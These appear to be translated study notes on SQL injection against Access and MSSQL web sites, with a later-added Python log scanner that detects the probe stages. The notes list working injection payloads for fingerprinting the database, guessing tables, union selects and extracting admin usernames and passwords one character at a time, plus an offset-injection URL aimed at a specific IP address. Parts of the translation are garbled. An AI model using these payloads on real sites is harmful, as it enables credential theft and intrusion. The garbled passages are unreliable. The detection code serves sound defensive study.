1. Access database introduction
A relational database management system; Microsoft's small database.
Advantages: improves speed, reduces the amount of code, avoids the use of process calls.
Disadvantages: when the data is too large, performance degrades; database flush writes cause problems; security not
File suffix: *.mdb
Tools for opening it: Assistant, broken barrier
Platform: Small Cyclone Aspweb tool

2. Access database call analysis
ASP web site, with parameters passed through (id=). Look at the parameters and at the query statement, use break-through analysis on the data, and audit the code to see whether there is a filter.

3. Access injection principle
First determine whether there is an injection point:
    ', and 1=1, and 1=2
If the previous ones are filtered out, judge with the following:
    or 1=1, or 1=2, and 1=23
or add a minus sign after the ID value.

Determine the database type by appending the following statements after id=. Sometimes there may be no permission.
    and exists (select * from msysobjects)>0    (Access-specific check)
    and exists (select * from sysobjects)>0     (SQL Server-specific check)

Determine what tables and fields the database has:
    and exists (select * from admin)        Successful access proves that there is an admin table
    and exists (select admin from admin)    Success proves that there is an admin field

Determine the field length:
    order by 10 is normal and order by 11 is not normal, so the field length is 10
    and 1=2 union select 1,2,3,4,5,6,7,8,9,10    (in Firefox we can generate this automatically)
    Positions 3 and 5 are displayed.

Determine the user name and password:
    and (select len(admin) from admin)>5    determines the length of the user name; the same applies to password
    We write admin and password at the corresponding numbers to get the account and password.

Determine the ASCII codes of the password and user name:
    and (select top 1 asc(mid(admin,1,1)) from admin)>0    judge one character at a time
    Tools of the same kind, such as Ah D, work in the same way.

4. Access injection tools
Ming Boy, pangolin, Ah D, Turnip head
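The probes listed in section 3 come in recognizable stages (boolean test, database fingerprint, table and field guesses, order by, union select, character-by-character extraction), so they stand out in web server logs. The following Python code is an added example, not part of the original notes; the log field layout, the stage names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Probe stages from section 3, most specific first; the first match wins.
# Stage names are labels made up for this example.
STAGES = [(name, re.compile(rx, re.I | re.S)) for name, rx in [
    ("db_fingerprint", r"\bexists\s*\(\s*select\b.*\bfrom\s+m?sysobjects\b"),
    ("schema_guess", r"\bexists\s*\(\s*select\b"),
    ("blind_extraction", r"\(\s*select\b.*\b(len|asc)\s*\("),
    ("union_select", r"\bunion\s+(all\s+)?select\b"),
    ("column_count", r"\border\s+by\s+\d+"),
    ("boolean_probe", r"\b(and|or)\s+\d+\s*=\s*\d+"),
]]

def classify(query):
    """Return the stage name for a raw (URL-encoded) query string, or None."""
    decoded = unquote_plus(query)
    for name, rx in STAGES:
        if rx.search(decoded):
            return name
    return None

def scan(lines):
    """Map client IP -> distinct stages seen, in order of first appearance."""
    seen = defaultdict(list)
    for line in lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 6:   # header or short line
            continue
        client, query = fields[2], fields[5]          # assumed field order
        stage = classify(query)
        if stage and stage not in seen[client]:
            seen[client].append(stage)
    return dict(seen)

# Constructed sample; assumed layout:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2024-01-01 10:00:01 192.0.2.10 GET /index.asp id=886 200
2024-01-01 10:00:05 192.0.2.77 GET /index.asp id=886+and+1=2 200
2024-01-01 10:00:09 192.0.2.77 GET /index.asp id=886+and+exists+(select+*+from+msysobjects)>0 500
2024-01-01 10:00:12 192.0.2.77 GET /index.asp id=886%20order%20by%2011 500
2024-01-01 10:00:15 192.0.2.77 GET /index.asp id=886+and+1=2+union+select+1,2,3+from+admin 200
2024-01-01 10:00:20 192.0.2.77 GET /index.asp id=886+and+(select+len(admin)+from+admin)>5 200
""".splitlines()

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A single client that walks through several of these stages against one id= parameter is a much stronger signal than any one pattern on its own.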

Offset injection
Solves the case where the table name is known but the column names are not. Knowing the field length, we use * instead and delete numbers until the position where the query succeeds; what gets displayed is fairly random.
Another approach to offset injection: find the login screen, inspect the elements, look at the login name and account, and view the information and field names.
Example: the site is known to have an Access injection.
The field length is judged to be 12.
sqlmap found the admin table; the union query shows 5 and 7.
The id can be found, but admin and pass cannot; clearly an Access injection.
Find the offset point.
So: 12-8=4, 4*2=8, 12-8=4. All have two parameters; there are four field values.
    http://218.245.4.113:8888/web03/ca55022fa7ae5c29d179041883fe1556/index.asp?id=886 and 1=1 Union select 1,2,3,4, * FROM (admin as a inner join admin as B on a.id=b.id)
Get the results, read the questions and submit the answers.
Access Pants Tracking

1. MSSQL database introduction
A relatively large database developed by Microsoft, and comparatively complete; a relatively new version is SQL Server 2012.
MSSQL service and port: the default port is 1433; use service.msc to view the service.
MSSQL installation: there are many guides on Baidu.
Open the database, right-click the database node on the left side -- New Database -- in the popup, enter the name -- Add -- OK.
File suffix name: lazy.mdf
Delete the database: right-click -- Tasks -- Detach -- select all -- OK -- then go to the drive and delete the two files.
Query statements are the same as for Access above; the specifics can be found online.
sa permissions: database operations, file management, command execution, registry read, SYSTEM; large permissions.
db permissions: file management, database operations; ordinary user.
public permissions: guest users.
2. MSSQL data call analysis
3. MSSQL injection statements
What follows is manual testing of a site to dump its data, which is not covered here.
Study note five: SQL Access and MSSQL injections